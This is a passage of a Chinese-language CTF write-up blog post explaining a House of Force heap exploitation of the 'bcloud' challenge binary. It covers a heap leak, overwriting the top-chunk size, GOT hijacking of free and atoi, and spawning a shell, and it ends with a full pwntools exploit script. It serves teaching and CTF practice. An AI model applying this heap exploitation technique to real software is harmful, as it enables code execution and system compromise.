<p>&#x5F53;&#x6211;&#x4EEC;Org&#x4E3A;64&#x4E2A;&#x5B57;&#x8282;&#x65F6;&#xFF0C;Org&#x7684;&#x7684;&#x622A;&#x65AD;&#x7B26;&#x2019;\x00&#x2019;&#x88AB;v2&#x622A;&#x65AD;&#xFF0C;&#x5F53;&#x6267;&#x884C;strcpy&#x51FD;&#x6570;&#x65F6;&#x4F1A;&#x5C06;Org&#x5F00;&#x59CB;&#x5230;Host&#x7ED3;&#x675F;&#x7684;&#x6240;&#x6709;&#x6570;&#x636E;&#x590D;&#x5236;&#x5230;v2&#x8FD9;&#x4E2A;&#x5806;&#x6307;&#x9488;&#x6307;&#x5411;&#x7684;&#x5185;&#x5B58;&#x533A;&#x57DF;&#xFF0C;&#x800C;&#x6B64;&#x65F6;v2&#x662F;&#x8DDD;&#x79BB;topchunk&#x6700;&#x8FD1;&#x7684;chunk&#xFF0C;&#x4F46;&#x662F;&#x5176;chunkdata&#x5927;&#x5C0F;&#x53EA;&#x6709;0x40(64)&#xFF0C;&#x6240;&#x4EE5;&#x6267;&#x884C;<code>strcpy(v2, &amp;s);</code>&#x540E;&#xFF0C;v2&#x88AB;&#x8986;&#x76D6;&#x5230;&#x4E86;topchunk&#x7684;pprev_size&#x5904;&#xFF0C;Host(v3)&#x8986;&#x76D6;&#x5230;topchunk&#x7684;size&#x90E8;&#x5206;&#x3002;&#x8FD9;&#x6837;&#x5C31;&#x53EF;&#x4EE5;&#x4FEE;&#x6539;topchunk&#x7684;&#x5927;&#x5C0F;&#x4E3A;0xffffffff</p>
<h4 id="3-&#x7533;&#x8BF7;&#x6B63;&#x786E;&#x5927;&#x5C0F;&#x7684;&#x5185;&#x5B58;&#xFF0C;&#x4FEE;&#x6539;topchun&#x7684;&#x6307;&#x9488;&#x5230;0x804b118"><a href="#3-&#x7533;&#x8BF7;&#x6B63;&#x786E;&#x5927;&#x5C0F;&#x7684;&#x5185;&#x5B58;&#xFF0C;&#x4FEE;&#x6539;topchun&#x7684;&#x6307;&#x9488;&#x5230;0x804b118" class="headerlink" title="3.&#x7533;&#x8BF7;&#x6B63;&#x786E;&#x5927;&#x5C0F;&#x7684;&#x5185;&#x5B58;&#xFF0C;&#x4FEE;&#x6539;topchun&#x7684;&#x6307;&#x9488;&#x5230;0x804b118"></a>3.&#x7533;&#x8BF7;&#x6B63;&#x786E;&#x5927;&#x5C0F;&#x7684;&#x5185;&#x5B58;&#xFF0C;&#x4FEE;&#x6539;topchun&#x7684;&#x6307;&#x9488;&#x5230;0x804b118</h4><p>&#x7B2C;&#x4E00;&#x6B65;&#x6CC4;&#x9732;&#x7684;&#x5806;&#x6307;&#x9488;&#x7684;&#x5730;&#x5740;&#xFF0C;&#x6211;&#x4EEC;&#x5C31;&#x53EF;&#x4EE5;&#x8BA1;&#x7B97;&#x51FA;topchunk&#x6307;&#x9488;&#x7684;&#x5730;&#x5740;&#x3002;&#x7B2C;&#x4E8C;&#x6B65;&#x4FEE;&#x6539;&#x4E86;topchunk&#x7684;size&#x4E3A;0xffffffff&#xFF0C;&#x6211;&#x4EEC;&#x5C31;&#x53EF;&#x4EE5;&#x7533;&#x8BF7;&#x8DB3;&#x591F;&#x5927;&#x7684;chunk&#xFF0C;&#x8BA9;topchunk&#x7684;&#x6307;&#x9488;&#x6307;&#x5411;&#x6211;&#x4EEC;&#x60F3;&#x8981;&#x7684;&#x5730;&#x5740;&#xFF0C;&#x8FD9;&#x91CC;&#x6211;&#x4EEC;&#x9009;&#x62E9;0x804B118&#xFF0C;&#x4ECE;&#x4E0B;&#x9762;&#x4F2A;&#x4EE3;&#x7801;*&#x5904;&#x53EF;&#x4EE5;&#x770B;&#x51FA;&#xFF0C;0x804B120&#x5B58;&#x653E;&#x7684;&#x662F;&#x6BCF;&#x4E00;&#x4E2A;chunk&#x7684;&#x5806;&#x6307;&#x9488;&#x3002;&#x5F53;topchunk&#x6307;&#x9488;&#x4E3A;0x805b118&#x65F6;&#xFF0C;&#x65B0;&#x7533;&#x8BF7;&#x7684;chunk&#x7684;data&#x5730;&#x5740;&#x5C31;&#x662F;0x804b120&#x3002;<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">newNote</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">  <span class="keyword">int</span> result; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">signed</span> <span class="keyword">int</span> i; <span class="comment">// [esp+18h] [ebp-10h]</span></span><br><span class="line">  <span class="keyword">int</span> v2; <span class="comment">// [esp+1Ch] [ebp-Ch]</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt;= <span class="number">9</span> &amp;&amp; dword_804B120[i]; ++i )</span><br><span class="line">    ;</span><br><span class="line">  <span class="keyword">if</span> ( i == <span class="number">10</span> )</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">&quot;Lack of space. Upgrade your account with just $100 :)&quot;</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Input the length of the note content:&quot;</span>);</span><br><span class="line">  v2 = sub_8048709();</span><br><span class="line">  dword_804B120[i] = (<span class="keyword">int</span>)<span class="built_in">malloc</span>(v2 + <span class="number">4</span>); <span class="comment">//*</span></span><br><span class="line">  <span class="keyword">if</span> ( !dword_804B120[i] )</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">  dword_804B0A0[i] = v2;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Input the content:&quot;</span>);</span><br><span class="line">  iread(dword_804B120[i], v2, <span class="number">10</span>);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Create success, the id is %d\n&quot;</span>, i);</span><br><span class="line">  result = i;</span><br><span class="line">  dword_804B0E0[i] = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<p>&#x9996;&#x5148;&#x6211;&#x4EEC;&#x8981;&#x6B63;&#x786E;&#x8BA1;&#x7B97;&#x7533;&#x8BF7;&#x7684;chunk&#xFF0C;&#x8BA9;topchunk&#x6307;&#x9488;&#x6307;&#x5411;0x804B118&#xFF0C;&#x56E0;&#x4E3A;&#x9700;&#x8981;0x8&#x4E2A;&#x5B57;&#x8282;&#x5B58;&#x653E;precv_size&#x548C;size&#x3002;<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">note_list = <span class="number">0x804B120</span></span><br><span class="line">target_addr = note_list - <span class="number">0x8</span></span><br><span class="line">top_addr = leakheap_addr + <span class="number">0x40</span> + <span class="number">0x48</span> + <span class="number">0x48</span> + <span class="number">24</span></span><br><span class="line">log.success(<span class="string">&quot;top_addr: &quot;</span>+hex(top_addr))</span><br><span class="line">malloc_size = -(top_addr-target_addr) - <span class="number">0x4</span> <span class="number">-0x8</span></span><br><span class="line">log.success(<span class="string">&quot;malloc_size: &quot;</span>+hex(malloc_size))</span><br><span class="line">newNote(<span class="number">0x10</span>,<span class="string">&apos;aaaa&apos;</span>)</span><br><span class="line">newNote(malloc_size,<span class="string">&apos;cccc&apos;</span>)</span><br></pre></td></tr></table></figure></p>
<p>&#x6B64;&#x65F6;&#x7684;top_addr&#x662F;&#x5728;*&#x4E4B;&#x524D;&#x7684;topchunk&#x7684;&#x6307;&#x9488;&#xFF0C;&#x5176;&#x4E2D;0x40+0x48+0x48&#x662F;&#x4FDD;&#x5B58;name&#x3001;org&#x3001;host&#x7684;&#x5927;&#x5C0F;</p>
<h5 id="glibc&#x4F1A;&#x5BF9;&#x7533;&#x8BF7;&#x7684;&#x5185;&#x5B58;&#x5927;&#x5C0F;&#x8FDB;&#x884C;&#x8C03;&#x6574;"><a href="#glibc&#x4F1A;&#x5BF9;&#x7533;&#x8BF7;&#x7684;&#x5185;&#x5B58;&#x5927;&#x5C0F;&#x8FDB;&#x884C;&#x8C03;&#x6574;" class="headerlink" title="glibc&#x4F1A;&#x5BF9;&#x7533;&#x8BF7;&#x7684;&#x5185;&#x5B58;&#x5927;&#x5C0F;&#x8FDB;&#x884C;&#x8C03;&#x6574;"></a>glibc&#x4F1A;&#x5BF9;&#x7533;&#x8BF7;&#x7684;&#x5185;&#x5B58;&#x5927;&#x5C0F;&#x8FDB;&#x884C;&#x8C03;&#x6574;</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* pad request bytes into a usable size -- internal version */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> request2size(req)                                         \</span></span><br><span class="line">  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK &lt; MINSIZE)  ?             \</span><br><span class="line">   MINSIZE :                                                      \</span><br><span class="line">   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) &amp; ~MALLOC_ALIGN_MASK)</span><br></pre></td></tr></table></figure>
<p>&#x5176;&#x4E2D;&#x5728;32&#x4F4D;&#x7CFB;&#x7EDF;&#x4E0B;SIZE_SZ=4&#xFF0C;MALLOC_ALIGN_MASK=8-1=7</p>
<p>&#x6240;&#x4EE5;newNote(0x10,&#x2019;aaaa&#x2019;)&#x7533;&#x8BF7;&#x5185;&#x5B58;&#x7684;&#x64CD;&#x4F5C;&#x4E3A;malloc(0x10+4)&#x5373;malloc(0x14)&#xFF0C;0x14&#x4E0D;&#x662F;8&#x7684;&#x500D;&#x6570;&#xFF0C;&#x901A;&#x8FC7;<code>((req) + SIZE_SZ + MALLOC_ALIGN_MASK) &amp; ~MALLOC_ALIGN_MASK)</code>&#x8BA1;&#x7B97;&#x771F;&#x6B63;&#x5206;&#x914D;&#x7684;&#x5185;&#x5B58;&#x5927;&#x5C0F;&#xFF0C;&#x800C;glibc&#x4E2D;&#x6E90;&#x7801;&#x6709;&#x4E00;&#x6BB5;&#x6CE8;&#x91CA;<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* For glibc, chunk2mem increases the address by 2*SIZE_SZ and</span></span><br><span class="line"><span class="comment"> MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap&apos;ed area is page</span></span><br><span class="line"><span class="comment">aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */</span></span><br></pre></td></tr></table></figure></p>
<p>&#x6240;&#x4EE5;&#x7533;&#x8BF7;&#x7684;&#x5185;&#x5B58;&#x5927;&#x5C0F;&#x4E3A;<code>((0x14) + 4 + 7) &amp; ~7) = 24</code>&#xFF0C;&#x6240;&#x4EE5;&#x8981;&#x52A0;24&#xFF0C;&#x6709;&#x4E86;topchunk&#x7684;&#x6307;&#x9488;&#xFF0C;&#x5C31;&#x53EF;&#x4EE5;&#x8BA1;&#x7B97;&#x5230;&#x5E95;&#x8BE5;&#x7533;&#x8BF7;&#x591A;&#x5C11;&#x5185;&#x5B58;&#xFF0C;&#x4F1A;&#x8BA9;topchunk&#x6307;&#x9488;&#x6307;&#x5411;0x804b118</p>
<p><code>malloc_size = -(top_addr-target_addr) - 0x4 -0x8</code>&#xFF0C;&#x7533;&#x8BF7;&#x6B63;&#x7684;size&#x4F1A;&#x62AC;&#x9AD8;topchunk&#x6307;&#x9488;&#xFF0C;&#x53CD;&#x4E4B;&#xFF0C;&#x56E0;&#x6B64;&#x52A0;&#x4E2A;&#x8D1F;&#x53F7;<code>-(top_addr-target_addr)</code></p>
<p>-0x4&#x662F;&#x4E3A;&#x4E86;&#x62B5;&#x6D88;&#x7A0B;&#x5E8F;&#x4E2D;&#x7684;<code>(int)malloc(v2 + 4)</code>&#xFF0C;-0x8&#x662F;&#x56E0;&#x4E3A;&#x5728;&#x7533;&#x8BF7;&#x5185;&#x5B58;&#x65F6;glibc&#x4F1A;&#x5BF9;&#x7533;&#x8BF7;&#x7684;&#x5927;&#x5C0F;&#x52A0;&#x4E0A;2*SIZE_SZ&#xFF0C;&#x586B;&#x5145;chunkhead&#x3002;</p>
<h4 id="4-&#x6CC4;&#x9732;libc&#x4E2D;&#x51FD;&#x6570;&#x7684;&#x5730;&#x5740;"><a href="#4-&#x6CC4;&#x9732;libc&#x4E2D;&#x51FD;&#x6570;&#x7684;&#x5730;&#x5740;" class="headerlink" title="4.&#x6CC4;&#x9732;libc&#x4E2D;&#x51FD;&#x6570;&#x7684;&#x5730;&#x5740;"></a>4.&#x6CC4;&#x9732;libc&#x4E2D;&#x51FD;&#x6570;&#x7684;&#x5730;&#x5740;</h4><p>&#x901A;&#x8FC7;&#x7B2C;&#x4E09;&#x6B65;&#xFF0C;&#x5DF2;&#x7ECF;&#x53EF;&#x4EE5;&#x63A7;&#x5236;&#x5806;&#x6307;&#x9488;&#xFF0C;&#x90A3;&#x4E48;&#x6211;&#x4EEC;&#x901A;&#x8FC7;editNote&#x51FD;&#x6570;&#x5C31;&#x53EF;&#x4EE5;&#x5199;&#x5165;&#x5806;&#x6307;&#x9488;&#x3002;</p>
<p>&#x7A0B;&#x5E8F;&#x4E2D;&#x6CA1;&#x6709;&#x6253;&#x5370;chunkdata&#x7684;&#x529F;&#x80FD;&#xFF0C;&#x56E0;&#x6B64;&#x9700;&#x8981;&#x81EA;&#x5DF1;&#x6784;&#x9020;&#x4E00;&#x4E2A;&#x3002;&#x6211;&#x7684;&#x601D;&#x8DEF;&#x662F;&#x5C06;free&#x51FD;&#x6570;&#x4FEE;&#x6539;&#x4E3A;print&#xFF0C;&#x8FD9;&#x6837;&#x5C31;&#x53EF;&#x4EE5;&#x6253;&#x5370;&#x51FA;chunkdata&#x7684;&#x5185;&#x5BB9;&#x3002;<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">payload = p32(elf.got[<span class="string">&apos;free&apos;</span>])</span><br><span class="line">payload += p32(elf.got[<span class="string">&apos;atoi&apos;</span>])</span><br><span class="line">payload += p32(elf.got[<span class="string">&apos;atoi&apos;</span>])</span><br><span class="line">newNote(<span class="number">0x100</span>,payload)</span><br><span class="line">editNote(<span class="number">0</span>,p32(elf.symbols[<span class="string">&apos;printf&apos;</span>]))</span><br><span class="line">deleteNote(<span class="number">1</span>)</span><br><span class="line">atoi_addr = u32(p.recvuntil(<span class="string">&apos;Delete success.&apos;</span>)[<span class="number">1</span>:<span class="number">5</span>])</span><br><span class="line">log.success(<span class="string">&apos;atoi_addr: &apos;</span>+hex(atoi_addr))</span><br></pre></td></tr></table></figure></p>
<p>&#x7B2C;&#x4E00;&#x4E2A;&#x5806;&#x6307;&#x9488;&#x5199;&#x4E3A;free@got&#xFF0C;&#x7B2C;&#x4E8C;&#x7B2C;&#x4E09;&#x5806;&#x6307;&#x9488;&#x5199;&#x4E3A;atoi@got&#xFF0C;&#x5C06;free@got&#x5199;&#x4E3A;print@plt&#xFF0C;<code>deleteNote(1)</code>&#x65F6;&#x4F1A;&#x6253;&#x5370;&#x51FA;atoi&#x5728;libc&#x7684;&#x5730;&#x5740;&#x3002;</p>
<h4 id="5-&#x8BA1;&#x7B97;system&#x7684;&#x5730;&#x5740;"><a href="#5-&#x8BA1;&#x7B97;system&#x7684;&#x5730;&#x5740;" class="headerlink" title="5.&#x8BA1;&#x7B97;system&#x7684;&#x5730;&#x5740;"></a>5.&#x8BA1;&#x7B97;system&#x7684;&#x5730;&#x5740;</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">libc_base = atoi_addr - libc.symbols[<span class="string">&apos;atoi&apos;</span>]</span><br><span class="line">log.success(<span class="string">&apos;libc_addr: &apos;</span>+hex(libc_base))</span><br><span class="line">system_addr = libc_base + libc.symbols[<span class="string">&apos;system&apos;</span>]</span><br><span class="line">log.success(<span class="string">&apos;system_addr: &apos;</span>+hex(system_addr))</span><br></pre></td></tr></table></figure>
<p>####6.get shell<br>&#x6709;&#x4E86;system&#x51FD;&#x6570;&#x5730;&#x5740;&#xFF0C;&#x53C8;&#x6709;&#x53EF;&#x63A7;&#x6307;&#x9488;&#xFF0C;&#x5C31;&#x53EF;&#x4EE5;&#x5C06;atoi@got&#x5199;&#x4E3A;system&#x51FD;&#x6570;&#x7684;&#x5730;&#x5740;&#xFF0C;&#x4F20;&#x5165;&#x2019;/bin/sh;&#x2019;&#x5C31;&#x53EF;&#x4EE5;get shell&#x3002;<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">editNote(<span class="number">2</span>,p32(system_addr))</span><br><span class="line">p.recvuntil(<span class="string">&apos;option---&gt;&gt;&apos;</span>)</span><br><span class="line">p.sendline(<span class="string">&apos;/bin/sh;&apos;</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<h3 id="0x03-&#x603B;&#x7ED3;"><a href="#0x03-&#x603B;&#x7ED3;" class="headerlink" title="0x03 &#x603B;&#x7ED3;"></a>0x03 &#x603B;&#x7ED3;</h3><p>&#x901A;&#x8FC7;&#x4EE5;&#x4E0A;&#x5206;&#x6790;&#xFF0C;&#x53EF;&#x4EE5;&#x603B;&#x7ED3;&#x51FA;House of Force&#x7684;&#x5229;&#x7528;&#x6761;&#x4EF6;</p>
<ul>
<li>&#x53EF;&#x4EE5;&#x4FEE;&#x6539;topchunk&#x7684;size</li>
<li>malloc(size)&#x4E2D;&#x7684;size&#x53EF;&#x63A7;</li>
</ul>
<h3 id="0x04-EXP"><a href="#0x04-EXP" class="headerlink" title="0x04 EXP"></a>0x04 EXP</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = process(<span class="string">&apos;./bcloud&apos;</span>)</span><br><span class="line">elf = ELF(<span class="string">&apos;./bcloud&apos;</span>)</span><br><span class="line">libc = ELF(<span class="string">&apos;./libc&apos;</span>)</span><br><span class="line"></span><br><span class="line">DEBUG = <span class="number">0</span></span><br><span class="line">VERBOSE = <span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> DEBUG:</span><br><span class="line">	gdb.attach(p)</span><br><span class="line"><span class="keyword">if</span> VERBOSE:</span><br><span class="line">	context.log_level = <span class="string">&apos;debug&apos;</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">newNote</span><span class="params">(length,content)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">&apos;---&gt;&gt;&apos;</span>)</span><br><span class="line">	p.sendline(<span class="string">&apos;1&apos;</span>)</span><br><span class="line">	p.recvuntil(<span class="string">&apos;Input the length of the note content:&apos;</span>)</span><br><span class="line">	p.sendline(str(length))</span><br><span class="line">	p.recvuntil(<span class="string">&apos;Input the content:&apos;</span>)</span><br><span class="line">	p.sendline(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">editNote</span><span class="params">(idx,content)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">&apos;---&gt;&gt;&apos;</span>)</span><br><span class="line">	p.sendline(<span class="string">&apos;3&apos;</span>)</span><br><span class="line">	p.recvuntil(<span class="string">&apos;Input the id:&apos;</span>)</span><br><span class="line">	p.sendline(str(idx))</span><br><span class="line">	p.recvuntil(<span class="string">&apos;Input the new content:\n&apos;</span>)</span><br><span class="line">	p.sendline(content)</span><br><span class="line">	p.recvuntil(<span class="string">&apos;Edit success.&apos;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">deleteNote</span><span class="params">(idx)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">&apos;---&gt;&gt;&apos;</span>)</span><br><span class="line">	p.sendline(<span class="string">&apos;4&apos;</span>)</span><br><span class="line">	p.recvuntil(<span class="string">&apos;Input the id:&apos;</span>)</span><br><span class="line">	p.sendline(str(idx))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pwn</span><span class="params">()</span>:</span></span><br><span class="line">	<span class="comment">#step1. leak heap address</span></span><br><span class="line">	p.recvuntil(<span class="string">&apos;Input your name:&apos;</span>)</span><br><span class="line">	p.send(<span class="string">&apos;a&apos;</span>*<span class="number">0x38</span>+<span class="string">&apos;b&apos;</span>*<span class="number">8</span>)</span><br><span class="line">	p.recvuntil(<span class="string">&apos;b&apos;</span>*<span class="number">8</span>)</span><br><span class="line">	leakheap_addr = u32(p.read(<span class="number">4</span>))</span><br><span class="line"></span><br><span class="line">	<span class="comment">#step2. set topchunk&apos;s size is -1</span></span><br><span class="line">	p.recvuntil(<span class="string">&apos;Org:&apos;</span>)</span><br><span class="line">	p.send(<span class="string">&apos;b&apos;</span>*<span class="number">0x40</span>)</span><br><span class="line">	p.recvuntil(<span class="string">&apos;Host:&apos;</span>)</span><br><span class="line">	p.send(p32(<span class="number">0xffffffff</span>)+<span class="string">&apos;\n&apos;</span>)</span><br><span class="line"></span><br><span class="line">	<span class="comment">#step3. alter the topchunk pointer to the target_addr(0x804b118)</span></span><br><span class="line">	note_list = <span class="number">0x804B120</span></span><br><span class="line">        target_addr = note_list - <span class="number">0x8</span></span><br><span class="line">        top_addr = leakheap_addr + <span class="number">0x40</span> + <span class="number">0x48</span> + <span class="number">0x48</span> + <span class="number">24</span></span><br><span class="line">        log.success(<span class="string">&quot;top_addr: &quot;</span>+hex(top_addr))</span><br><span class="line">	malloc_size = -(top_addr-target_addr) - <span class="number">0x4</span> <span class="number">-0x8</span></span><br><span class="line">	log.success(<span class="string">&quot;malloc_size: &quot;</span>+hex(malloc_size))</span><br><span class="line">	newNote(<span class="number">0x10</span>,<span class="string">&apos;aaaa&apos;</span>)</span><br><span class="line">	newNote(malloc_size,<span class="string">&apos;cccc&apos;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	<span class="comment">#step4. leak atoi_addr</span></span><br><span class="line">	payload = p32(elf.got[<span class="string">&apos;free&apos;</span>])</span><br><span class="line">	payload += p32(elf.got[<span class="string">&apos;atoi&apos;</span>])</span><br><span class="line">	payload += p32(elf.got[<span class="string">&apos;atoi&apos;</span>])</span><br><span class="line">	newNote(<span class="number">0x100</span>,payload)</span><br><span class="line">	editNote(<span class="number">0</span>,p32(elf.symbols[<span class="string">&apos;printf&apos;</span>]))</span><br><span class="line">	deleteNote(<span class="number">1</span>)</span><br><span class="line">	atoi_addr = u32(p.recvuntil(<span class="string">&apos;Delete success.&apos;</span>)[<span class="number">1</span>:<span class="number">5</span>])</span><br><span class="line">	log.success(<span class="string">&apos;atoi_addr: &apos;</span>+hex(atoi_addr))</span><br><span class="line"></span><br><span class="line">	<span class="comment">#step5. calc system_addr</span></span><br><span class="line">	libc_base = atoi_addr - libc.symbols[<span class="string">&apos;atoi&apos;</span>]</span><br><span class="line">	log.success(<span class="string">&apos;libc_addr: &apos;</span>+hex(libc_base))</span><br><span class="line">	system_addr = libc_base + libc.symbols[<span class="string">&apos;system&apos;</span>]</span><br><span class="line">	log.success(<span class="string">&apos;system_addr: &apos;</span>+hex(system_addr))</span><br><span class="line"></span><br><span class="line">	<span class="comment">#step6. get shell</span></span><br><span class="line">	editNote(<span class="number">2</span>,p32(system_addr))</span><br><span class="line">	p.recvuntil(<span class="string">&apos;option---&gt;&gt;&apos;</span>)</span><br><span class="line">	p.sendline(<span class="string">&apos;/bin/sh;&apos;</span>)</span><br><span class="line">	p.interactive()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">	pwn()</span><br></pre></td></tr></table></figure>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/House-of-Force/" rel="tag"># House of Force</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/10/libc源码分析-chunk的释放/" rel="next" title="libc源码分析-chunk的释放">
                <i class="fa fa-chevron-left"></i> libc源码分析-chunk的释放
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/24/2018-SUCTF-Heap-[off by one,unlink]/" rel="prev" title="2018-SUCTF-Heap-[off by one,unlink]">
                2018-SUCTF-Heap-[off by one,unlink] <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/IMG.jpg" alt="Po1lux">
            
              <p class="site-author-name" itemprop="name">Po1lux</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">56</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">28</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://xn--74q78i15hxv3arigm4e.cn" title="嘉神川克罗艾" target="_blank">嘉神川克罗艾</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
